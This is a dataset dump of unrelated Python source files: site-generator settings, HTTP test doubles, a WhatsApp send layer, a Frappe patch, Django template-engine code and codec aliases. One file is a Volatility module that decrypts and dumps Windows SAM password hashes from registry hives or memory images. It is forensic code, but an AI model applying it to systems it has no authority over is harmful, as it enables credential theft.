code
stringlengths 1
199k
|
|---|
import os

# Root of the site project: the directory containing this settings file.
# All other site folders are resolved relative to it.
ROOT_PATH = os.path.abspath(os.path.dirname(__file__))
LAYOUT_DIR = os.path.join(ROOT_PATH, 'layout')    # page templates
CONTENT_DIR = os.path.join(ROOT_PATH, 'content')  # source pages
MEDIA_DIR = os.path.join(ROOT_PATH, 'media')      # css/js/images
DEPLOY_DIR = os.path.join(ROOT_PATH, 'deploy')    # generated site output
TMP_DIR = os.path.join(ROOT_PATH, 'deploy_tmp')   # intermediate build artifacts
BACKUPS_DIR = os.path.join(ROOT_PATH, 'backups')
BACKUP = False  # when True, previous deploys are copied to BACKUPS_DIR
# Public-facing URL configuration for the generated site.
SITE_ROOT = "/"
SITE_WWW_URL = "http://www.yoursite.com"
SITE_NAME = "Your Site"
SITE_AUTHOR = "Your Name"
GENERATE_ABSOLUTE_FS_URLS = False
GENERATE_CLEAN_URLS = False
# Page names treated as the index page of a folder when clean URLs are on.
LISTING_PAGE_NAMES = ['listing', 'index', 'default']
APPEND_SLASH = False
# Maps file extensions to the chain of processors run over media files.
# Processors run in the listed order (template expansion first, then the
# CSS/JS preprocessor, then minification).
MEDIA_PROCESSORS = {
    '*': {
        '.css': ('hydeengine.media_processors.TemplateProcessor',
                 'hydeengine.media_processors.YUICompressor',),
        '.ccss': ('hydeengine.media_processors.TemplateProcessor',
                  'hydeengine.media_processors.CleverCSS',
                  'hydeengine.media_processors.YUICompressor',),
        '.sass': ('hydeengine.media_processors.TemplateProcessor',
                  'hydeengine.media_processors.SASS',
                  'hydeengine.media_processors.YUICompressor',),
        '.less': ('hydeengine.media_processors.TemplateProcessor',
                  'hydeengine.media_processors.LessCSS',
                  'hydeengine.media_processors.YUICompressor',),
        '.styl': ('hydeengine.media_processors.TemplateProcessor',
                  'hydeengine.media_processors.Stylus',
                  'hydeengine.media_processors.CSSmin',),
        '.hss': (
            'hydeengine.media_processors.TemplateProcessor',
            'hydeengine.media_processors.HSS',
            'hydeengine.media_processors.YUICompressor',),
        '.js': (
            'hydeengine.media_processors.TemplateProcessor',
            'hydeengine.media_processors.YUICompressor',)
    }
}
# Processors run over content files, keyed by content sub-folder.
CONTENT_PROCESSORS = {
    'prerendered/': {
        '*.*': ('hydeengine.content_processors.PassthroughProcessor',)
    }
}
SITE_POST_PROCESSORS = {
    # 'media/js': {
    #     'hydeengine.site_post_processors.FolderFlattener' : {
    #         'remove_processed_folders': True,
    #         'pattern':"*.js"
    #     }
    # }
}
# Extra variables made available to every template.
CONTEXT = {
    'GENERATE_CLEAN_URLS': GENERATE_CLEAN_URLS
}
# File-name patterns to force-include / exclude from processing.
FILTER = {
    'include': (".htaccess",),
    'exclude': (".*", "*~")
}
GROWL = None  # optional Growl notification target
YUI_COMPRESSOR = "./lib/yuicompressor-2.4.2.jar"
# NOTE(review): name looks misspelled ("COMPILER") — confirm what consumers
# read before renaming, since this is a public settings attribute.
CLOSURE_COMPRILER = None
HSS_PATH = None # If you don't want to use HSS
TEMPLATE_DIRS = (LAYOUT_DIR, CONTENT_DIR, TMP_DIR, MEDIA_DIR)
INSTALLED_APPS = (
    'hydeengine',
    'django.contrib.webdesign',
)
|
def f():
    """Iterate over an empty sequence; always returns None.

    The ``else`` clause of a ``for`` loop runs when the loop finishes
    without ``break`` — here immediately, since the sequence is empty.
    """
    for i in []:
        pass
    else:
        # Original text contained a "<caret>" editor placeholder here,
        # which is not valid Python; an explicit no-op keeps the block valid.
        pass
|
""" Unit test suite for daemon package.
"""
import scaffold
suite = scaffold.make_suite()
|
import copy
import httplib2
class fake_httplib2(object):
    """Test double standing in for an ``httplib2.Http`` client.

    Behavior is selected by ``return_type``:

    * falsy (default) — ``request`` echoes its arguments back in the body;
    * an ``int`` — ``request`` returns a canned response with that status;
    * anything else — ``request`` raises ``TypeError``.
    """

    def __init__(self, return_type=None, *args, **kwargs):
        self.return_type = return_type

    def request(self, uri, method="GET", body=None, headers=None,
                redirections=5, connection_type=None):
        """Mimic ``httplib2.Http.request`` without any network access."""
        if not self.return_type:
            # Echo mode: hand the call's arguments back so tests can
            # inspect exactly what was "sent".
            echoed = {
                'uri': uri,
                'method': method,
                'body': body,
                'headers': headers
            }
            return httplib2.Response(headers), echoed
        if isinstance(self.return_type, int):
            # Canned-status mode: fixed plain-text body with the
            # requested status code.
            payload = "fake_body"
            header_info = {
                'content-type': 'text/plain',
                'status': str(self.return_type),
                'content-length': len(payload)
            }
            return httplib2.Response(header_info), payload
        raise TypeError("unsupported return type %s" % self.return_type)
class fake_httplib(object):
    """Test double mimicking an ``httplib`` HTTP response object."""

    def __init__(self, headers, body=None,
                 version=1.0, status=200, reason="Ok"):
        """
        :param headers: dict representing HTTP response headers
        :param body: file-like object
        :param version: HTTP Version
        :param status: Response status code
        :param reason: Status code related message.
        """
        self.headers = headers
        self.version = version
        self.status = status
        self.reason = reason
        self.body = body

    def getheaders(self):
        # Deep-copy first so callers cannot mutate the canonical headers.
        return copy.deepcopy(self.headers).items()

    def getheader(self, key, default):
        return self.headers.get(key, default)

    def read(self, amt):
        # Delegate straight to the underlying file-like body.
        return self.body.read(amt)
|
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0
@contact: bdolangavitt@wesleyan.edu
"""
import volatility.obj as obj
import volatility.win32.rawreg as rawreg
import volatility.win32.hive as hive
from Crypto.Hash import MD5, MD4
from Crypto.Cipher import ARC4, DES
from struct import unpack, pack
odd_parity = [
1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
97, 97, 98, 98, 100, 100, 103, 103, 104, 104, 107, 107, 109, 109, 110, 110,
112, 112, 115, 115, 117, 117, 118, 118, 121, 121, 122, 122, 124, 124, 127, 127,
128, 128, 131, 131, 133, 133, 134, 134, 137, 137, 138, 138, 140, 140, 143, 143,
145, 145, 146, 146, 148, 148, 151, 151, 152, 152, 155, 155, 157, 157, 158, 158,
161, 161, 162, 162, 164, 164, 167, 167, 168, 168, 171, 171, 173, 173, 174, 174,
176, 176, 179, 179, 181, 181, 182, 182, 185, 185, 186, 186, 188, 188, 191, 191,
193, 193, 194, 194, 196, 196, 199, 199, 200, 200, 203, 203, 205, 205, 206, 206,
208, 208, 211, 211, 213, 213, 214, 214, 217, 217, 218, 218, 220, 220, 223, 223,
224, 224, 227, 227, 229, 229, 230, 230, 233, 233, 234, 234, 236, 236, 239, 239,
241, 241, 242, 242, 244, 244, 247, 247, 248, 248, 251, 251, 253, 253, 254, 254
]
p = [ 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3,
0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 ]
aqwerty = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
anum = "0123456789012345678901234567890123456789\0"
antpassword = "NTPASSWORD\0"
almpassword = "LMPASSWORD\0"
lmkey = "KGS!@#$%"
empty_lm = "aad3b435b51404eeaad3b435b51404ee".decode('hex')
empty_nt = "31d6cfe0d16ae931b73c59d7e0c089c0".decode('hex')
def str_to_key(s):
    """Expand a 7-byte string into an 8-byte odd-parity DES key string."""
    b = [ord(c) for c in s[:7]]
    # Spread the 56 input bits across eight 7-bit groups.
    raw = [
        b[0] >> 1,
        ((b[0] & 0x01) << 6) | (b[1] >> 2),
        ((b[1] & 0x03) << 5) | (b[2] >> 3),
        ((b[2] & 0x07) << 4) | (b[3] >> 4),
        ((b[3] & 0x0F) << 3) | (b[4] >> 5),
        ((b[4] & 0x1F) << 2) | (b[5] >> 6),
        ((b[5] & 0x3F) << 1) | (b[6] >> 7),
        b[6] & 0x7F,
    ]
    # Shift each group into a full byte and force odd parity on it.
    return "".join(chr(odd_parity[v << 1]) for v in raw)
def sid_to_key(sid):
    """Derive the pair of DES keys protecting a user's hashes from the RID."""
    # Little-endian bytes of the RID.
    rid_bytes = [chr((sid >> shift) & 0xFF) for shift in (0, 8, 16, 24)]
    # First key: the four bytes followed by the first three again.
    s1 = "".join(rid_bytes) + rid_bytes[0] + rid_bytes[1] + rid_bytes[2]
    # Second key: rotated variant, last byte first, then repeat its prefix.
    s2 = rid_bytes[3] + rid_bytes[0] + rid_bytes[1] + rid_bytes[2]
    s2 = s2 + s2[0] + s2[1] + s2[2]
    return str_to_key(s1), str_to_key(s2)
def hash_lm(pw):
    """Compute the LanMan hash of a password (Python 2 str)."""
    # Uppercase, truncate to 14 chars, and null-pad to exactly 14.
    padded = (pw[:14].upper() + "\0" * 14)[:14]
    left = DES.new(str_to_key(padded[:7]), DES.MODE_ECB)
    right = DES.new(str_to_key(padded[7:]), DES.MODE_ECB)
    # Each half independently DES-encrypts the fixed "KGS!@#$%" constant.
    return left.encrypt(lmkey) + right.encrypt(lmkey)
def hash_nt(pw):
    # NT hash: MD4 digest of the UTF-16-LE encoded password.
    return MD4.new(pw.encode('utf-16-le')).digest()
def find_control_set(sysaddr):
    """Return the active control set number from the SYSTEM hive.

    Reads the "Current" value under the hive's Select key. Falls back to 1
    (ControlSet001) whenever the hive root, the Select key, or the value
    cannot be found.
    """
    root = rawreg.get_root(sysaddr)
    if not root:
        return 1
    csselect = rawreg.open_key(root, ["Select"])
    if not csselect:
        return 1
    for v in rawreg.values(csselect):
        if v.Name == "Current":
            return v.Data
    # BUGFIX: previously fell off the loop returning None when no "Current"
    # value existed, which made get_bootkey build "ControlSetNone".
    return 1
def get_bootkey(sysaddr):
    """Assemble the system bootkey (syskey) from the SYSTEM hive.

    The 16 bootkey bytes are hidden, hex-encoded, in the *class names* of
    the JD/Skew1/GBG/Data subkeys under ControlSetNNN\\Control\\Lsa, then
    shuffled through the fixed permutation table ``p``.
    Returns None when the hive root or Lsa key cannot be opened.
    """
    cs = find_control_set(sysaddr)
    lsa_base = ["ControlSet{0:03}".format(cs), "Control", "Lsa"]
    lsa_keys = ["JD", "Skew1", "GBG", "Data"]
    root = rawreg.get_root(sysaddr)
    if not root:
        return None
    lsa = rawreg.open_key(root, lsa_base)
    if not lsa:
        return None
    bootkey = ""
    for lk in lsa_keys:
        key = rawreg.open_key(lsa, [lk])
        # The class name is UTF-16-LE text holding hex digits; decode both
        # layers to recover 4 raw bytes per subkey.
        class_data = sysaddr.read(key.Class, key.ClassLength)
        bootkey += class_data.decode('utf-16-le').decode('hex')
    # Scramble the 16 bytes with the fixed permutation.
    bootkey_scrambled = ""
    for i in range(len(bootkey)):
        bootkey_scrambled += bootkey[p[i]]
    return bootkey_scrambled
def get_hbootkey(samaddr, bootkey):
    """Derive the hashed bootkey from the SAM hive's Account F value.

    MD5(F[0x70:0x80] + aqwerty + bootkey + anum) seeds an RC4 stream that
    decrypts the 32-byte hashed bootkey stored at F[0x80:0xA0].
    Returns None if the bootkey is missing or the SAM keys can't be read.
    """
    sam_account_path = ["SAM", "Domains", "Account"]
    if not bootkey:
        return None
    root = rawreg.get_root(samaddr)
    if not root:
        return None
    sam_account_key = rawreg.open_key(root, sam_account_path)
    if not sam_account_key:
        return None
    F = None
    for v in rawreg.values(sam_account_key):
        if v.Name == 'F':
            F = samaddr.read(v.Data, v.DataLength)
    if not F:
        return None
    md5 = MD5.new()
    md5.update(F[0x70:0x80] + aqwerty + bootkey + anum)
    rc4_key = md5.digest()
    rc4 = ARC4.new(rc4_key)
    # RC4 is symmetric: "encrypt" here decrypts the stored hashed bootkey.
    hbootkey = rc4.encrypt(F[0x80:0xA0])
    return hbootkey
def get_user_keys(samaddr):
    """Return the per-user registry keys under SAM\\Domains\\Account\\Users.

    The "Names" index subkey is filtered out; an empty list is returned
    when the hive root or Users key cannot be opened.
    """
    root = rawreg.get_root(samaddr)
    if root:
        users = rawreg.open_key(root, ["SAM", "Domains", "Account", "Users"])
        if users:
            return [sub for sub in rawreg.subkeys(users) if sub.Name != "Names"]
    return []
def decrypt_single_hash(rid, hbootkey, enc_hash, lmntstr):
    """Decrypt one 16-byte SAM hash for the given RID.

    The stored hash is RC4-obfuscated with a key derived from the hashed
    bootkey, the RID and the LM/NT marker string, then DES-encrypted in two
    8-byte halves with keys derived from the RID.
    """
    key_a, key_b = sid_to_key(rid)
    cipher_a = DES.new(key_a, DES.MODE_ECB)
    cipher_b = DES.new(key_b, DES.MODE_ECB)
    digest = MD5.new()
    digest.update(hbootkey[:0x10] + pack("<L", rid) + lmntstr)
    stream = ARC4.new(digest.digest())
    deobfuscated = stream.encrypt(enc_hash)
    return cipher_a.decrypt(deobfuscated[:8]) + cipher_b.decrypt(deobfuscated[8:])
def decrypt_hashes(rid, enc_lm_hash, enc_nt_hash, hbootkey):
    """Decrypt a user's LM and NT hashes; "" stands in for a missing hash."""
    lmhash = (decrypt_single_hash(rid, hbootkey, enc_lm_hash, almpassword)
              if enc_lm_hash else "")
    nthash = (decrypt_single_hash(rid, hbootkey, enc_nt_hash, antpassword)
              if enc_nt_hash else "")
    return lmhash, nthash
def encrypt_single_hash(rid, hbootkey, hash, lmntstr):
    """Inverse of decrypt_single_hash: DES-encrypt the halves, then RC4."""
    key_a, key_b = sid_to_key(rid)
    cipher_a = DES.new(key_a, DES.MODE_ECB)
    cipher_b = DES.new(key_b, DES.MODE_ECB)
    sealed = cipher_a.encrypt(hash[:8]) + cipher_b.encrypt(hash[8:])
    digest = MD5.new()
    digest.update(hbootkey[:0x10] + pack("<L", rid) + lmntstr)
    stream = ARC4.new(digest.digest())
    return stream.encrypt(sealed)
def encrypt_hashes(rid, lm_hash, nt_hash, hbootkey):
    """Encrypt a user's LM and NT hashes; "" stands in for a missing hash."""
    enc_lmhash = (encrypt_single_hash(rid, hbootkey, lm_hash, almpassword)
                  if lm_hash else "")
    enc_nthash = (encrypt_single_hash(rid, hbootkey, nt_hash, antpassword)
                  if nt_hash else "")
    return enc_lmhash, enc_nthash
def get_user_hashes(user_key, hbootkey):
    """Extract and decrypt a user's (LM, NT) hash pair from their V value.

    The user's RID is the key name itself (hex). Offsets into V come from
    the fixed header layout: the stored offsets are relative to 0xCC, and
    the first 4 bytes of each hash record are a header that is skipped.
    Returns None when no V value is present.
    """
    samaddr = user_key.obj_vm
    rid = int(str(user_key.Name), 16)
    V = None
    for v in rawreg.values(user_key):
        if v.Name == 'V':
            V = samaddr.read(v.Data, v.DataLength)
    if not V:
        return None
    lm_offset = unpack("<L", V[0x9c:0xa0])[0] + 0xCC + 4
    lm_len = unpack("<L", V[0xa0:0xa4])[0] - 4
    nt_offset = unpack("<L", V[0xa8:0xac])[0] + 0xCC + 4
    nt_len = unpack("<L", V[0xac:0xb0])[0] - 4
    # A zero length means the hash is absent (e.g. LM disabled).
    if lm_len:
        enc_lm_hash = V[lm_offset:lm_offset + 0x10]
    else:
        enc_lm_hash = ""
    if nt_len:
        enc_nt_hash = V[nt_offset:nt_offset + 0x10]
    else:
        enc_nt_hash = ""
    return decrypt_hashes(rid, enc_lm_hash, enc_nt_hash, hbootkey)
def get_user_name(user_key):
    """Read the account name (UTF-16-LE) out of a user key's V value."""
    samaddr = user_key.obj_vm
    V = None
    for value in rawreg.values(user_key):
        if value.Name == 'V':
            V = samaddr.read(value.Data, value.DataLength)
    if not V:
        return None
    # Name location is stored at fixed header offsets, relative to 0xCC.
    offset = unpack("<L", V[0x0c:0x10])[0] + 0xCC
    length = unpack("<L", V[0x10:0x14])[0]
    return V[offset:offset + length].decode('utf-16-le')
def get_user_desc(user_key):
    """Read the account description (UTF-16-LE) from a user key's V value."""
    samaddr = user_key.obj_vm
    V = None
    for value in rawreg.values(user_key):
        if value.Name == 'V':
            V = samaddr.read(value.Data, value.DataLength)
    if not V:
        return None
    # Description location is stored at fixed header offsets, relative to 0xCC.
    offset = unpack("<L", V[0x24:0x28])[0] + 0xCC
    length = unpack("<L", V[0x28:0x2c])[0]
    return V[offset:offset + length].decode('utf-16-le')
def dump_hashes(sysaddr, samaddr):
    """Yield pwdump-style "name:rid:lmhash:nthash:::" lines for every user.

    Yields NoneObject diagnostics (instead of raising) when the hashed
    bootkey is invalid or a particular user's hashes cannot be read.
    Empty hashes are replaced by the well-known empty-password hashes.
    """
    bootkey = get_bootkey(sysaddr)
    hbootkey = get_hbootkey(samaddr, bootkey)
    if hbootkey:
        for user in get_user_keys(samaddr):
            ret = get_user_hashes(user, hbootkey)
            if not ret:
                yield obj.NoneObject("Cannot get user hashes for {0}".format(user))
            else:
                lmhash, nthash = ret
                if not lmhash:
                    lmhash = empty_lm
                if not nthash:
                    nthash = empty_nt
                # RID is the user key's name interpreted as hex.
                yield "{0}:{1}:{2}:{3}:::".format(get_user_name(user), int(str(user.Name), 16),
                                                  lmhash.encode('hex'), nthash.encode('hex'))
    else:
        yield obj.NoneObject("Hbootkey is not valid")
def dump_memory_hashes(addr_space, config, syshive, samhive):
    # Wrap the in-memory SYSTEM and SAM hives in hive address spaces and dump.
    sysaddr = hive.HiveAddressSpace(addr_space, config, syshive)
    samaddr = hive.HiveAddressSpace(addr_space, config, samhive)
    return dump_hashes(sysaddr, samaddr)
def dump_file_hashes(syshive_fname, samhive_fname):
    # Same as dump_memory_hashes, but reading hive files from disk.
    sysaddr = hive.HiveFileAddressSpace(syshive_fname)
    samaddr = hive.HiveFileAddressSpace(samhive_fname)
    return dump_hashes(sysaddr, samaddr)
|
from yowsup.layers.interface import YowInterfaceLayer, ProtocolEntityCallback
from yowsup.layers.protocol_messages.protocolentities import TextMessageProtocolEntity
import threading
import logging
logger = logging.getLogger(__name__)
class SendLayer(YowInterfaceLayer):
    """Yowsup interface layer that sends a queue of messages on connect.

    The messages to send are injected by YowsupSendStack as a list of
    (phone, message) tuples under PROP_MESSAGES. Once every message has
    been acknowledged by the server, KeyboardInterrupt is raised to stop
    the stack's event loop.
    """

    # Replaced by the @param message in YowsupSendStack construction,
    # i.e. a list of (jid, message) tuples.
    PROP_MESSAGES = "org.openwhatsapp.yowsup.prop.sendclient.queue"

    def __init__(self):
        super(SendLayer, self).__init__()
        # Ids of sent messages that are still awaiting a server ack.
        self.ackQueue = []
        self.lock = threading.Condition()

    # Callback invoked on a successful connection to the WhatsApp server.
    @ProtocolEntityCallback("success")
    def onSuccess(self, successProtocolEntity):
        """Send every queued message and remember its id for ack tracking."""
        # BUGFIX: use the Condition as a context manager instead of paired
        # acquire()/release() calls so the lock is released even if entity
        # construction or toLower() raises.
        with self.lock:
            for phone, message in self.getProp(self.__class__.PROP_MESSAGES, []):
                # Build the destination JID: full JIDs pass through, group
                # ids (containing '-') get the group suffix, plain numbers
                # get the user suffix.
                if '@' in phone:
                    to = phone
                elif '-' in phone:
                    to = "%s@g.us" % phone
                else:
                    to = "%s@s.whatsapp.net" % phone
                messageEntity = TextMessageProtocolEntity(message, to = to)
                # Track the message id; it is removed when its ack arrives.
                self.ackQueue.append(messageEntity.getId())
                self.toLower(messageEntity)

    # The recipient's server sends an ack for each delivered message.
    @ProtocolEntityCallback("ack")
    def onAck(self, entity):
        """Drop the acked id; interrupt the stack once the queue is empty."""
        with self.lock:
            if entity.getId() in self.ackQueue:
                self.ackQueue.remove(entity.getId())
            if not self.ackQueue:
                logger.info("Message sent")
                # Deliberate: unwinds the yowsup event loop once all
                # queued messages are confirmed delivered.
                raise KeyboardInterrupt()
|
from __future__ import unicode_literals
import frappe
def execute():
    """Patch: mark Draft-but-submitted Timesheets as Submitted and set their
    start/end dates from the earliest/latest Timesheet Detail rows.

    Only touches rows where docstatus = 1 (already submitted in the DB) yet
    status is still 'Draft', i.e. records left inconsistent by earlier code.
    """
    frappe.db.sql("""update
        `tabTimesheet` as ts,
        (
            select min(from_time)as from_time, max(to_time) as to_time, parent from `tabTimesheet Detail` group by parent
        ) as tsd
        set ts.status = 'Submitted', ts.start_date = tsd.from_time, ts.end_date = tsd.to_time
        where tsd.parent = ts.name and ts.status = 'Draft' and ts.docstatus =1""")
|
import os
import warnings
from collections import Counter, OrderedDict
from django.apps import apps
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils import lru_cache
from django.utils._os import upath
from django.utils.deprecation import RemovedInDjango110Warning
from django.utils.functional import cached_property
from django.utils.module_loading import import_string
class InvalidTemplateEngineError(ImproperlyConfigured):
    """Raised when a requested template engine alias has no configuration."""
    pass
class EngineHandler(object):
    """Lazily instantiates and caches the configured template engines.

    Engines are described by settings.TEMPLATES (or the list passed to the
    constructor) and are looked up by their NAME alias via __getitem__.
    """

    def __init__(self, templates=None):
        """
        templates is an optional list of template engine definitions
        (structured like settings.TEMPLATES).
        """
        self._templates = templates
        # alias -> instantiated backend; filled lazily by __getitem__.
        self._engines = {}

    @cached_property
    def templates(self):
        # Normalized OrderedDict of engine configs keyed by NAME alias.
        if self._templates is None:
            self._templates = settings.TEMPLATES
        if not self._templates:
            # Legacy fallback: synthesize a DjangoTemplates config from the
            # pre-1.8 TEMPLATE_* settings, with a deprecation warning.
            warnings.warn(
                "You haven't defined a TEMPLATES setting. You must do so "
                "before upgrading to Django 1.10. Otherwise Django will be "
                "unable to load templates.", RemovedInDjango110Warning)
            self._templates = [
                {
                    'BACKEND': 'django.template.backends.django.DjangoTemplates',
                    'DIRS': settings.TEMPLATE_DIRS,
                    'OPTIONS': {
                        'allowed_include_roots': settings.ALLOWED_INCLUDE_ROOTS,
                        'context_processors': settings.TEMPLATE_CONTEXT_PROCESSORS,
                        'debug': settings.TEMPLATE_DEBUG,
                        'loaders': settings.TEMPLATE_LOADERS,
                        'string_if_invalid': settings.TEMPLATE_STRING_IF_INVALID,
                    },
                },
            ]
        templates = OrderedDict()
        backend_names = []
        for tpl in self._templates:
            tpl = tpl.copy()
            try:
                # This will raise an exception if 'BACKEND' doesn't exist or
                # isn't a string containing at least one dot.
                default_name = tpl['BACKEND'].rsplit('.', 2)[-2]
            except Exception:
                invalid_backend = tpl.get('BACKEND', '<not defined>')
                raise ImproperlyConfigured(
                    "Invalid BACKEND for a template engine: {}. Check "
                    "your TEMPLATES setting.".format(invalid_backend))
            # Fill in defaults so downstream code can rely on every key.
            tpl.setdefault('NAME', default_name)
            tpl.setdefault('DIRS', [])
            tpl.setdefault('APP_DIRS', False)
            tpl.setdefault('OPTIONS', {})
            templates[tpl['NAME']] = tpl
            backend_names.append(tpl['NAME'])
        # Aliases must be unique — duplicates would silently shadow engines.
        counts = Counter(backend_names)
        duplicates = [alias for alias, count in counts.most_common() if count > 1]
        if duplicates:
            raise ImproperlyConfigured(
                "Template engine aliases aren't unique, duplicates: {}. "
                "Set a unique NAME for each engine in settings.TEMPLATES."
                .format(", ".join(duplicates)))
        return templates

    def __getitem__(self, alias):
        """Return the engine for alias, instantiating it on first access."""
        try:
            return self._engines[alias]
        except KeyError:
            try:
                params = self.templates[alias]
            except KeyError:
                raise InvalidTemplateEngineError(
                    "Could not find config for '{}' "
                    "in settings.TEMPLATES".format(alias))
            # If importing or initializing the backend raises an exception,
            # self._engines[alias] isn't set and this code may get executed
            # again, so we must preserve the original params. See #24265.
            params = params.copy()
            backend = params.pop('BACKEND')
            engine_cls = import_string(backend)
            engine = engine_cls(params)
            self._engines[alias] = engine
            return engine

    def __iter__(self):
        # Iterate over the configured aliases.
        return iter(self.templates)

    def all(self):
        # Instantiate (if needed) and return every configured engine.
        return [self[alias] for alias in self]
@lru_cache.lru_cache()
def get_app_template_dirs(dirname):
    """
    Return an iterable of paths of directories to load app templates from.
    dirname is the name of the subdirectory containing templates inside
    installed applications.
    """
    candidates = (
        os.path.join(app_config.path, dirname)
        for app_config in apps.get_app_configs()
        if app_config.path
    )
    # Immutable return value because it will be cached and shared by callers.
    return tuple(upath(path) for path in candidates if os.path.isdir(path))
|
""" Encoding Aliases Support
This module is used by the encodings package search function to
map encodings names to module names.
Note that the search function normalizes the encoding names before
doing the lookup, so the mapping will have to map normalized
encoding names to module names.
Contents:
The following aliases dictionary contains mappings of all IANA
character set names for which the Python core library provides
codecs. In addition to these, a few Python specific codec
aliases have also been added.
"""
# Mapping of *normalized* encoding names (lowercase, separators folded to
# '_') to the codec module name that implements them.
aliases = {
    # Please keep this list sorted alphabetically by value !
    # ascii codec
    '646' : 'ascii',
    'ansi_x3.4_1968' : 'ascii',
    'ansi_x3_4_1968' : 'ascii', # some email headers use this non-standard name
    'ansi_x3.4_1986' : 'ascii',
    'cp367' : 'ascii',
    'csascii' : 'ascii',
    'ibm367' : 'ascii',
    'iso646_us' : 'ascii',
    'iso_646.irv_1991' : 'ascii',
    'iso_ir_6' : 'ascii',
    'us' : 'ascii',
    'us_ascii' : 'ascii',
    ## base64_codec codec
    #'base64' : 'base64_codec',
    #'base_64' : 'base64_codec',
    # big5 codec
    'big5_tw' : 'big5',
    'csbig5' : 'big5',
    # big5hkscs codec
    'big5_hkscs' : 'big5hkscs',
    'hkscs' : 'big5hkscs',
    ## bz2_codec codec
    #'bz2' : 'bz2_codec',
    # cp037 codec
    '037' : 'cp037',
    'csibm037' : 'cp037',
    'ebcdic_cp_ca' : 'cp037',
    'ebcdic_cp_nl' : 'cp037',
    'ebcdic_cp_us' : 'cp037',
    'ebcdic_cp_wt' : 'cp037',
    'ibm037' : 'cp037',
    'ibm039' : 'cp037',
    # cp1026 codec
    '1026' : 'cp1026',
    'csibm1026' : 'cp1026',
    'ibm1026' : 'cp1026',
    # cp1140 codec
    '1140' : 'cp1140',
    'ibm1140' : 'cp1140',
    # cp1250 codec
    '1250' : 'cp1250',
    'windows_1250' : 'cp1250',
    # cp1251 codec
    '1251' : 'cp1251',
    'windows_1251' : 'cp1251',
    # cp1252 codec
    '1252' : 'cp1252',
    'windows_1252' : 'cp1252',
    # cp1253 codec
    '1253' : 'cp1253',
    'windows_1253' : 'cp1253',
    # cp1254 codec
    '1254' : 'cp1254',
    'windows_1254' : 'cp1254',
    # cp1255 codec
    '1255' : 'cp1255',
    'windows_1255' : 'cp1255',
    # cp1256 codec
    '1256' : 'cp1256',
    'windows_1256' : 'cp1256',
    # cp1257 codec
    '1257' : 'cp1257',
    'windows_1257' : 'cp1257',
    # cp1258 codec
    '1258' : 'cp1258',
    'windows_1258' : 'cp1258',
    # cp424 codec
    '424' : 'cp424',
    'csibm424' : 'cp424',
    'ebcdic_cp_he' : 'cp424',
    'ibm424' : 'cp424',
    # cp437 codec
    '437' : 'cp437',
    'cspc8codepage437' : 'cp437',
    'ibm437' : 'cp437',
    # cp500 codec
    '500' : 'cp500',
    'csibm500' : 'cp500',
    'ebcdic_cp_be' : 'cp500',
    'ebcdic_cp_ch' : 'cp500',
    'ibm500' : 'cp500',
    # cp775 codec
    '775' : 'cp775',
    'cspc775baltic' : 'cp775',
    'ibm775' : 'cp775',
    # cp850 codec
    '850' : 'cp850',
    'cspc850multilingual' : 'cp850',
    'ibm850' : 'cp850',
    # cp852 codec
    '852' : 'cp852',
    'cspcp852' : 'cp852',
    'ibm852' : 'cp852',
    # cp855 codec
    '855' : 'cp855',
    'csibm855' : 'cp855',
    'ibm855' : 'cp855',
    # cp857 codec
    '857' : 'cp857',
    'csibm857' : 'cp857',
    'ibm857' : 'cp857',
    # cp858 codec
    '858' : 'cp858',
    'csibm858' : 'cp858',
    'ibm858' : 'cp858',
    # cp860 codec
    '860' : 'cp860',
    'csibm860' : 'cp860',
    'ibm860' : 'cp860',
    # cp861 codec
    '861' : 'cp861',
    'cp_is' : 'cp861',
    'csibm861' : 'cp861',
    'ibm861' : 'cp861',
    # cp862 codec
    '862' : 'cp862',
    'cspc862latinhebrew' : 'cp862',
    'ibm862' : 'cp862',
    # cp863 codec
    '863' : 'cp863',
    'csibm863' : 'cp863',
    'ibm863' : 'cp863',
    # cp864 codec
    '864' : 'cp864',
    'csibm864' : 'cp864',
    'ibm864' : 'cp864',
    # cp865 codec
    '865' : 'cp865',
    'csibm865' : 'cp865',
    'ibm865' : 'cp865',
    # cp866 codec
    '866' : 'cp866',
    'csibm866' : 'cp866',
    'ibm866' : 'cp866',
    # cp869 codec
    '869' : 'cp869',
    'cp_gr' : 'cp869',
    'csibm869' : 'cp869',
    'ibm869' : 'cp869',
    # cp932 codec
    '932' : 'cp932',
    'ms932' : 'cp932',
    'mskanji' : 'cp932',
    'ms_kanji' : 'cp932',
    # cp949 codec
    '949' : 'cp949',
    'ms949' : 'cp949',
    'uhc' : 'cp949',
    # cp950 codec
    '950' : 'cp950',
    'ms950' : 'cp950',
    # euc_jis_2004 codec
    'jisx0213' : 'euc_jis_2004',
    'eucjis2004' : 'euc_jis_2004',
    'euc_jis2004' : 'euc_jis_2004',
    # euc_jisx0213 codec
    'eucjisx0213' : 'euc_jisx0213',
    # euc_jp codec
    'eucjp' : 'euc_jp',
    'ujis' : 'euc_jp',
    'u_jis' : 'euc_jp',
    # euc_kr codec
    'euckr' : 'euc_kr',
    'korean' : 'euc_kr',
    'ksc5601' : 'euc_kr',
    'ks_c_5601' : 'euc_kr',
    'ks_c_5601_1987' : 'euc_kr',
    'ksx1001' : 'euc_kr',
    'ks_x_1001' : 'euc_kr',
    # gb18030 codec
    'gb18030_2000' : 'gb18030',
    # gb2312 codec
    'chinese' : 'gb2312',
    'csiso58gb231280' : 'gb2312',
    'euc_cn' : 'gb2312',
    'euccn' : 'gb2312',
    'eucgb2312_cn' : 'gb2312',
    'gb2312_1980' : 'gb2312',
    'gb2312_80' : 'gb2312',
    'iso_ir_58' : 'gb2312',
    # gbk codec
    '936' : 'gbk',
